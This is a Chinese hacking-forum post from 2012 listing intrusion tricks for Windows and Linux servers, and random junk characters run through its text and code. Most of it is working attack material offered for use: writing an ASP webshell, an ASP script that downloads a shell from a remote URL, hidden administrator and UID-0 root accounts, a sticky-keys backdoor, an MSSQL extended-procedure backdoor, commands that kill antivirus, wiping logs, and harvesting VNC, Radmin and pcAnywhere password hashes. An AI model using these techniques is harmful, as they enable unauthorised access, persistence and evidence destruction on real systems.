中国网络渗透测试联盟

标题: 渗透技巧总结 [打印本页]

---

作者: admin    时间: 2012-9-5 15:00
标题: 渗透技巧总结
旁站路径问题
1、读网站配置。
# S3 W: k) Z3 b/ [; C; G7 O) M2、用以下VBS
On Error Resume Next
If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
( A9 ~& }, y' E1 \. W. o8 G        
" d8 q5 n& G0 c- P9 w/ ]- m9 i. X( p
) N, P# s- q( k! G, }5 F8 i8 QMsgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "
# X( u! S4 g; s" F
Usage:Cscript vWeb.vbs",4096,"Lilo"
& f7 I0 n2 X  X3 g- }3 k6 L        WScript.Quit
End If
Set ObjService=GetObject
" W+ {4 B; J. y0 E) u, P
("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
9 E( Z* k, S) ]/ `) K$ E        If IsNumeric(obj3w.Name)
6 k0 D" J8 T$ Z
- s" S3 D9 M8 j* eThen
                Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
         
/ X& F2 }& F1 {+ b1 A  [
/ }5 q/ E% A3 W  w       Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
                If Err
; d* B5 K+ Z) ?- c
: j2 n- T( }) L9 `<> 0 Then WScript.Quit (1)
3 z' ~/ U$ g4 J. J; @                WScript.Echo Chr(10) & "[" &

/ e% e4 }9 j6 ^2 b2 m% `: L  [( YOService.ServerComment & "]"
                For Each Binds In OService.ServerBindings
" X; P, b7 N! H$ K     
6 u8 M+ E# d6 y8 g& C9 L& A2 D- \! ?
0 w6 `( z1 K1 v$ V                   Web = "{ " & Replace(Binds,":"," } { ") & " }"
                        
) c& T% F6 m5 ~7 x$ q3 T1 x' ]
WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
! M2 n9 Z# ~( b' ^0 I                Next
      
1 Z( i: B2 [6 A+ z. I/ ]4 y9 ^: k
         WScript.Echo "ath            : " & VDirObj.Path
+ f$ v+ V4 e* J4 g% M        End If
) [5 X- \) j) \$ O+ I( Y# \Next
复制代码
# i/ P* X0 ~9 W3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权）
* i* `, ?, S8 F3 u& l4、得到目标站目录，不能直接跨的。通过echo  ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp  像目标目录写入webshell。或者还可以试试type命令.
—————————————————————
WordPress的平台，爆绝对路径的方法是：
url/wp-content/plugins/akismet/akismet.php
url/wp-content/plugins/akismet/hello.php
——————————————————————
phpMyAdmin暴路径办法:
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
8 y' |: J3 l' ?2 S' ?0 nphpmyadmin/themes/darkblue_orange/layout.inc.php
————————————————————
) N" ]4 i7 o7 Y3 p0 O5 Z& }网站可能目录(注：一般是虚拟主机类）
data/htdocs.网站/网站/
————————————————————
CMD下操作VPN相关
netsh ras set user administrator permit #允许administrator拨入该VPN
+ v' B$ O  E9 U# G, Nnetsh ras set user administrator deny #禁止administrator拨入该VPN
netsh ras show user #查看哪些用户可以拨入VPN
: F8 A( _6 I) \3 I/ W- [% s. J. Pnetsh ras ip show config #查看VPN分配IP的方式
% `8 b. i; c* Z7 Mnetsh ras ip set addrassign method = pool #使用地址池的方式分配IP
; y$ x1 _% H9 }: n0 r7 v$ }1 B4 |netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
————————————————————
; B3 k$ k8 I0 [( |  Z) O2 b- \命令行下添加SQL用户的方法
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
$ H) ?# x" Z9 M  ]6 n& m! pexec master.dbo.sp_addlogin test,123
3 i/ |9 i# S6 k; UEXEC sp_addsrvrolemember 'test, 'sysadmin'
4 Y+ x8 y8 N% `5 y* ?% h+ h$ A然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
$ D" H& }$ u1 _: \) E" e
另类的加用户方法
在删掉了net.exe和不用adsi之外，新的加用户的方法。代码如下：
, w8 F  K; t' _; gjs:
- _6 P% q$ J5 q: O' Q$ U2 l! r( Wvar o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;

vbs:
5 Q) U+ I! V/ t+ d4 n, @( USet   o=CreateObject( "Shell.Users" )
Set z=o.create("test")
1 C: M" F- K7 D& h, y# p; y5 H2 ^" ?z.changePassword "123456",""
& T& E7 K5 Y7 o2 r" d/ lz.setting("AccountType")=3
1 z# D* a2 K) U5 t, {! H6 |& l——————————————————
- R& @! F& o( `cmd访问控制权限控制（注：反everyone不可读，工具-文件夹选项-使用简单的共享去掉即可）
) t' E3 i: l, e8 c
命令如下
% P6 {7 u, j  M5 _3 Pcacls c: /e /t /g everyone:F           #c盘everyone权限
9 h# e( C+ _/ pcacls "目录" /d everyone               #everyone不可读，包括admin
————————以下配合PR更好————
3389相关
a、防火墙TCP/IP筛选.（关闭net stop policyagent & net stop sharedaccess）
b、内网环境（LCX）
c、终端服务器超出了最大允许连接
+ ^  v  S8 `6 P9 b, [0 g6 cXP 运行mstsc /admin
2003 运行mstsc /console   

杀软关闭（把杀软所在的文件的所有权限去掉）
处理变态诺顿企业版：
net stop "Symantec AntiVirus" /y
8 ~  _% A9 W6 X% u' K$ a! ^6 `net stop "Symantec AntiVirus Definition Watcher" /y
% \/ R( P) B9 O5 Mnet stop "Symantec Event Manager" /y
net stop "System Event Notification" /y
net stop "Symantec Settings Manager" /y
& ]' _& w% {) |
( n. A; n7 |# ~. T- h6 A# C卖咖啡：net stop "McAfee McShield"
. M' m+ \$ C$ `, L- `3 {$ R0 s————————————————————

6 l' ?  f8 {% V; f/ l4 R0 P5次SHIFT：
6 ~" z" V% P6 D) ycopy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
% x7 A4 t: ^: X3 X3 M+ ccopy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
& Q7 i3 i: |' R9 j  dcopy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
: v- y5 H' c( x* S. t) f! u# [——————————————————————
隐藏账号添加：
1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
2、导出注册表SAM下用户的两个键值
3、在用户管理界面里的admin$删除，然后把备份的注册表导回去。
4、利用Hacker Defender把相关用户注册表隐藏
——————————————————————
MSSQL扩展后门：
USE master;
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
3 D- w" R: I; @7 N# L( P1 EGRANT exec On xp_helpsystem TO public;
3 V% k0 C4 [1 f* F9 @' ?- {———————————————————————
日志处理
9 o. O' s% R  F: nC:\WINNT\system32\LogFiles\MSFTPSVC1>下有
% u& z! _: K" o2 N- A3 X) Yex011120.log / ex011121.log / ex011124.log三个文件，
直接删除 ex0111124.log
2 j( o8 Q6 |7 r: D0 k5 @8 A不成功，“原文件...正在使用”
! K& R, k& R1 Y( I1 E当然可以直接删除ex011120.log / ex011121.log
用记事本打开ex0111124.log，删除里面的一些内容后，保存，覆盖退出，成功。
当停止msftpsvc服务后可直接删除ex011124.log

MSSQL查询分析器连接记录清除：
. f' N- r: [  S- g1 h% ~5 O) H: }/ xMSSQL 2000位于注册表如下：
/ s1 D# S+ I2 Y% R! f% IHKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
/ @3 S/ A3 I/ h3 j9 u; K3 u找到接接过的信息删除。
' i' T( y# w7 j$ g, xMSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL

Server\90\Tools\Shell\mru.dat
—————————————————————————
防BT系统拦截可使用远程下载shell，也达到了隐藏自身的效果，也可以做为超隐蔽的后门，神马的免杀webshell，用服务器安全工具一扫通通挂掉了）

2 \8 ?3 W* ^2 H2 w& R<%
" I5 e# Q  s( X6 HSub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
) ~8 ~  @0 N" V+ e% h0 NDim Ads, Retrieval, GetRemoteData
On Error Resume Next
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", s_RemoteFileUrl, False, "", ""
.Send
8 O( |; B1 Q; l& X' YGetRemoteData = .ResponseBody
End With
Set Retrieval = Nothing
Set Ads = Server.CreateObject("Adodb.Stream")
With Ads
0 e) V3 a' o' K. ^; o$ a1 X5 P.Type = 1
.Open
.Write GetRemoteData
/ i' ?8 I- x/ Y- X, m" r$ L.SaveToFile Server.MapPath(s_LocalFileName), 2
; U5 d% e' d2 J* I3 Z, M.Cancel()
.Close()
5 o, F6 e0 N4 A+ a. \. JEnd With
! s* S# _" i. H6 FSet Ads=nothing
End Sub
. b+ K; W" s$ x& d! {" F$ \3 h3 H
eWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
%>
6 M! X0 Q6 D( d: u4 t5 }
+ J0 e9 t- V, R3 N' L1 n' cVNC提权方法:
& h$ {7 w  r3 I! g: g& ^利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
+ D4 f: Z+ A5 ^9 E: F注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"
Radmin 默认端口是4899，
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
! A8 b9 \: @# a! a4 Q6 K) ^7 ZHKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
9 b  e. M6 L5 X7 a% D然后用HASH版连接。
8 L& |# j( D+ Y* s2 `如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。
保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
; P3 F$ v$ Q9 K5 Z0 F1 CUsers\Application Data\Symantec\pcAnywhere\文件夹下。
9 g0 T8 _; Y8 n# M8 b——————————————————————
/ F0 s; O5 l5 x9 B# j; U, a搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
+ h# c2 X4 i9 @- \3 [——————————————————----------
5 S! u) |2 }1 _WinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式下下
& {1 h2 [/ x1 f# A来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。
& I" M8 w6 j- t6 k没有删cmd组建的直接加用户。
7i24的web目录也是可写，权限为administrator。

/ |/ v5 H. Q2 ]+ s1433 SA点构建注入点。
<%
strSQLServerName = "服务器ip"
strSQLDBUserName = "数据库帐号"
strSQLDBPassword = "数据库密码"
7 D, Y8 G% K+ y7 YstrSQLDBName = "数据库名称"
Set conn = Server.createObject("ADODB.Connection")
7 h3 B0 X- l/ ]% x. {strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName &

";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" &

* ]( J, ?' \+ X( O" DstrSQLDBName & ";"
) O4 S! _/ @4 gconn.open strCon
dim rs,strSQL,id
3 o$ ?* z* ^: vset rs=server.createobject("ADODB.recordset")
  S, D; ]* J: M. Y" w  i0 X" _id = request("id")
8 p" J* \( _0 e9 n+ d+ C6 q# GstrSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
0 W; U/ D6 w9 z. W/ `8 Jrs.close
%>
复制代码
3 g1 W0 m' f1 ?, S******liunx 相关******
0 g) [) T: N6 z: E一.ldap渗透技巧
1.cat /etc/nsswitch
7 ]( u5 K& X# K. j看看密码登录策略我们可以看到使用了file ldap模式
7 [1 y/ J+ s. V7 s
9 Z; U/ b6 ]9 s2.less /etc/ldap.conf
1 q+ v! V, @- p% B4 R" m* @4 abase ou=People,dc=unix-center,dc=net
  z# ]! r) N# u1 Y6 V找到ou,dc,dc设置

3.查找管理员信息
- f7 Q6 x3 M- T匿名方式
2 P5 @" Q$ m+ o. a  p# @: tldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
9 Q) I9 a* }7 D, X4 \/ f
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
  G9 s  ?) j) |

" N- q/ j) R9 L4 M* `/ S) A& Y" F4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

: I1 ]- X2 \" }( ~! x5 t6 X6 P- ^实战:
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式

. z  K# `) h) [# F2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
& G7 O5 s; e2 Z  W6 o7 r
# P7 W1 X' k& B: i3.查找管理员信息
" B( Z/ @3 x  L; ?2 L: ]匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

1 q  f; S8 L; i* p& z5 ?"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
$ e0 W  X; R9 }有密码形式
, o+ C) J- o# a. X# Aldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
) g5 `+ r  s+ y' P
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2


4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
6 f& x" _4 q* z8 ^. _& m; \6 w
渗透实战:
; L: z1 J% K" r8 ^4 B) ~. f1.返回所有的属性
5 Y' p& f$ {9 U2 Xldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
' G% ]* q/ k1 h7 i0 RobjectClass: domain
6 R  y; Y/ T: r! k1 T; W6 Z
# }! _- S$ z" ]" r# gdn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
( }# |2 V0 _4 ^& P( h- J: K! G7 f% robjectClass: inetOrgPerson
; X9 F  D7 u9 d/ _" e+ ^objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: manager
cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
6 |* J7 D& r4 [7 }/ C# SobjectClass: person
" q0 [+ a+ ^# r/ a4 h3 a4 C- ?objectClass: top
sn: superadmin
cn: superadmin
1 e; `# T" m3 l  \- z
dn: uid=admin,dc=ruc,dc=edu,dc=cn
: C; m5 h3 j8 t- ^# ^uid: admin
$ O$ Q8 m' t: J9 h" ?  _objectClass: inetOrgPerson
objectClass: organizationalPerson
* U: T: B3 I7 t2 k, m" _/ p; y; pobjectClass: person
3 Q7 Y7 Q) z* C7 u2 A  G4 QobjectClass: top
sn: admin
cn: admin
! L0 p: U* x$ c7 f
dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
objectClass: top
1 o& u. e: G. eobjectClass: person
2 k/ \5 p' T: Z, d& ?; c5 z" BobjectClass: organizationalPerson
$ V# n; }' _1 s8 _1 i4 pobjectClass: inetOrgPerson
sn: dcp_anonymous
; I6 a( _" X. P* O2 B- ucn: dcp_anonymous

2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" |
1 L8 ]0 x6 Q% `- k- U8 i4 |) M+ U
more
version: 1
8 i0 C: _* \" t% H5 r* G% edn: dc=ruc,dc=edu,dc=cn
; Z" Q% B4 q+ M. vdc: ruc
objectClass: domain
4 H/ n: c. x1 |' f
3.查找
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
+ C+ h: Q5 B/ [# O% j; N/ t* Yversion: 1
( X. Z8 u% C* [" Udn:
* ]* ^% h* D* x, x2 pobjectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
/ j( ^4 U9 K3 b$ M) \supportedExtension: 1.3.6.1.4.1.4203.1.11.1
3 ?; g% ~/ m7 e' e% hsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
1 b' [% r2 v' N: Q0 l- ^& S$ Y( j; zsupportedExtension: 2.16.840.1.113730.3.5.3
: \$ p1 z. l$ L8 {, bsupportedExtension: 2.16.840.1.113730.3.5.5
) K: E6 z/ A8 S! n% b8 }6 ?supportedExtension: 2.16.840.1.113730.3.5.6
# c# Z# C( C4 t/ ]2 ^) N* YsupportedExtension: 2.16.840.1.113730.3.5.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
; c- A, j# V+ BsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
! J" i$ F' Z) O" p0 e5 ^) MsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
. X. n, t* C  U( {+ gsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
* y# j/ l4 F! X! _supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
8 e8 L7 ]( e" X5 g3 @4 ysupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
: T1 K! X# I9 g& OsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
9 U7 `% P6 f1 g0 Y; A" r$ ~8 ]supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
3 E. A9 X' c5 R( t/ _supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
4 K8 }8 c8 h  {+ {- asupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
4 {# P1 m1 S5 p9 T$ W2 J, BsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
% Z; A& h$ Q$ X6 ^) {: f; _# esupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
/ D! f% }1 z. Y: m0 |1 C7 }supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
4 A" o& i1 ~* W7 ]  k) YsupportedExtension: 1.3.6.1.4.1.1466.20037
8 D+ W) h" }4 l9 h5 N4 D8 Z( DsupportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
supportedControl: 2.16.840.1.113730.3.4.4
( ~! Q, q1 o# @( W9 S9 H# L. k5 A2 _( gsupportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
! W1 Y7 V. b8 Q9 O4 A" n; l3 G' W, M, wsupportedControl: 2.16.840.1.113730.3.4.16
supportedControl: 2.16.840.1.113730.3.4.15
7 M' Z! w: S" ^/ B6 QsupportedControl: 2.16.840.1.113730.3.4.17
: P$ u1 ?+ k+ X7 N2 WsupportedControl: 2.16.840.1.113730.3.4.19
: d: M9 t+ l  h/ ?  U7 V6 h" r: asupportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
1 g7 d2 v7 O& w3 B: D4 T$ R  {. csupportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
3 m! y% c+ R% v1 F$ ]3 V% L* l* tsupportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
' z2 T5 z+ l; b/ }8 TsupportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
  ]( v- s2 d  f) j6 X6 q! J+ c' [( s% NsupportedControl: 2.16.840.1.113730.3.4.14
6 r9 d4 \4 w( Q7 k/ d  gsupportedControl: 1.3.6.1.4.1.1466.29539.12
$ ~+ l: @2 F2 \  n8 |9 S/ w9 n( `supportedControl: 2.16.840.1.113730.3.4.12
supportedControl: 2.16.840.1.113730.3.4.18
- l2 l* L+ f5 v2 J0 o, g# h" |7 N. T  tsupportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
. b$ G1 a. z$ n% ^$ jsupportedLDAPVersion: 2
supportedLDAPVersion: 3
- m, |5 z/ v9 O" WvendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
3 v8 s$ @; N% @( Q2 t# Sdataversion: 020090516011411
8 s0 y% Z8 L& f$ |7 C7 Cnetscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
" j8 P2 N2 @; T% S2 n* y% N+ P9 RsupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
* A! j6 k$ Y* E4 g  }* T7 GsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
+ U" T1 }! O, b4 O$ f7 J" [/ P, XsupportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
" [+ m& P& d9 e5 [supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
. [1 A* [# Z; P7 K5 q( msupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
" B3 P4 U& b9 z$ N* i2 c; lsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
+ J" X/ H: X! p. t& W- q9 [supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
* r" D7 v) u0 P/ M( N6 _8 \supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
/ X2 `4 K1 _, M# `- M& v/ r/ P( xsupportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
1 M, \9 r$ x! osupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
9 D: S3 p, L9 R  |' usupportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
4 O  w& Q8 @! t' V" ksupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
7 p. I# I" g0 Y3 L2 _2 M+ L. ^supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
4 j& h: t7 |0 o4 P# e2 S" }3 ]: LsupportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
8 q( t$ p  B1 z* }2 ^7 E& tsupportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
% d" K' ?* D4 y, K3 EsupportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
: a1 q& r8 A3 u% d9 r, |/ a& vsupportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
  T  a; E: x; c" C1 |supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
. H* Z, z; \  s1 y* c1 a1 L5 x& q5 ?: [supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
; _5 i" m+ u& @supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
, m, f0 r4 S2 z" K" ZsupportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
$ V% F+ r  I$ U# NsupportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
  {  h& |; |0 J# O: b: XsupportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
7 i; t; q" X) I. I) c* u+ R) VsupportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
9 o: e9 G3 x! MsupportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
: x% p/ Q3 |# I' XsupportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
8 a# t1 B4 x% _  O) T% LsupportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
* I+ r3 J: J- S, p7 f# e% T0 N————————————
: u9 F8 B- [0 X5 [2. NFS渗透技巧
& M, B! [. b8 o8 G7 d  P$ Gshowmount -e ip
- H# k& W2 n& C* g( f% I列举IP
——————
3.rsync渗透技巧
1.查看rsync服务器上的列表
( z: U; J  l9 l" V, K4 x0 |/ K% Krsync 210.51.X.X::
finance
img_finance
auto
+ h, _2 V( y2 F( zimg_auto
html_cms
$ S# i/ t- [3 r& b$ Nimg_cms
ent_cms
ent_img
6 ^7 b! [" Z8 M' Q( G$ E% ~' @& N( Lceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
" y7 e. R0 J: B$ r* d! |/ rgamesimg
media
mediaimg
+ M1 k7 g- f4 }" g+ [. Qfashion
res-fashion
res-fo
3 f0 B3 @( p8 ^" ~  D8 Ftaobao-home
res-taobao-home
( v5 G( u) t. J0 a- h% H' P0 q) S' Thouse
2 q) H0 u- x0 v) wres-house
res-home
5 w( v6 h) N$ C9 r6 _res-edu
8 t4 d3 Z( z9 E& C7 f  U% }/ u# C( rres-ent
# t/ I" ?$ K+ u, zres-labs
res-news
res-phtv
% P/ A. |! t/ Y; ^) W7 pres-media
, B1 E7 q/ C4 K0 F& \* [8 l. ?+ n, ^home
edu
" c7 y8 ]* c/ }% Y# @' M! `- F8 unews
* y/ X9 H. H; ^res-book
3 P, C- A8 o7 Z8 k0 c' k
' R7 O4 {& N% X" V看相应的下级目录(注意一定要在目录后面添加上/)
' D" }- i1 X8 u# m, t/ {

rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
, U. A4 ?5 {' s0 S5 h7 G6 T; Nrsync 210.51.X.X::edu/
1 b; K+ z( g8 Q# x/ E# [/ y
2.下载rsync服务器上的配置文件
( p- _, T# S$ O6 ?5 |! r/ krsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)
  f, o+ ^' U9 brsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt
% i+ D2 x% j# i; @- B7 _+ _1 g
四.squid渗透技巧
+ j+ D0 w4 D  i6 a) _nc -vv baidu.com 80
; \  K: ^5 h& J6 U* v5 gGET HTTP://www.sina.com / HTTP/1.0
/ U. [/ D0 m0 e/ {# s5 kGET HTTP://WWW.sina.com:22 / HTTP/1.0
; a  J. V, G5 o% l: [五.SSH端口转发
4 Y: D: l3 L) c+ s) lssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
) f: T2 _( @. l5 h8 [0 g
六.joomla渗透小技巧
  p+ t; q" Y9 U1 c, v. ]) z确定版本
$ e6 [0 E, A' [index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-
0 ~0 z5 x1 v8 F! C" m
; c' {# E' U( r3 S15&catid=32:languages&Itemid=47
. f( j' {' \( F6 `4 m4 D
5 U2 `* ^% D3 q2 Y3 b& d1 {9 p重新设置密码
8 ?( l3 W0 Y/ X( Lindex.php?option=com_user&view=reset&layout=confirm
' q5 m3 B: d. }# e2 t9 E
% C! o4 o% \4 e七: Linux添加UID为0的root用户
% U2 k& K/ D* [0 o' Z1 juseradd -o -u 0 nothack
# m# S' r9 g$ H# [
